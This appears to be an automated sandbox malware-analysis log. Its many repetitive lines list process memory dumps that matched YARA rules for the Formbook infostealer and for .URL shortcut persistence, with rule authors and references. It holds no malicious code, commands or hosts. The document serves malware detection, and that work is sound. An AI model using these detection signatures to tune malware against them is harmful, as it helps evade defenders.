Source: 0000000A.00000003.584292302.00000000045A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.562335520.00000000046D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561342324.00000000039EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560628845.00000000039EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000003.497233291.00000000045D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560576590.00000000046D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497427116.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583748218.00000000045A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560966486.00000000039EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000003.584057831.00000000038CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561221425.00000000046D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.562432544.00000000039EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.584430165.00000000045A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497196939.00000000045D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497027305.00000000045D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000003.583809882.00000000038CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561955738.00000000039EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583259344.00000000045A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583847406.00000000045A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.496929665.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000003.583317580.00000000038CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000003.583980388.00000000038CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000003.497250611.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583904644.00000000038CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560450286.00000000039EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497289431.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560538390.00000000039EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.562142811.00000000046D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497089082.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.562245816.00000000039EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583483116.00000000038CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497109502.00000000045D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.584129270.00000000038CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583705715.00000000038CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.584336021.00000000038CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560383083.00000000046D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561149693.00000000039EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561547476.00000000039EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497453789.00000000045D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000003.583441882.00000000045A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.584088819.00000000045A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497486545.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000003.584234578.00000000038CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.584506071.00000000038CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560320590.00000000039EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497066247.00000000045D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497151468.00000000045D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497352648.00000000045D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497402362.00000000045D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497007493.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497047805.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000003.497310666.00000000045D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497216692.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561741705.00000000039EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583353394.00000000045A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.496970511.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497375359.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561654798.00000000046D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560760985.00000000039EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583951721.00000000045A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560713668.00000000046D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497129768.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497173543.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560263078.00000000046D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.496988721.00000000045D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.584197318.00000000045A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000003.583532798.00000000045A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.584010373.00000000045A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560188388.00000000039EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.496950369.00000000045D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583656067.00000000045A4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583176269.00000000038CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497333632.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561086888.00000000046D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561847558.00000000046D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583592654.00000000038CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561433212.00000000046D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
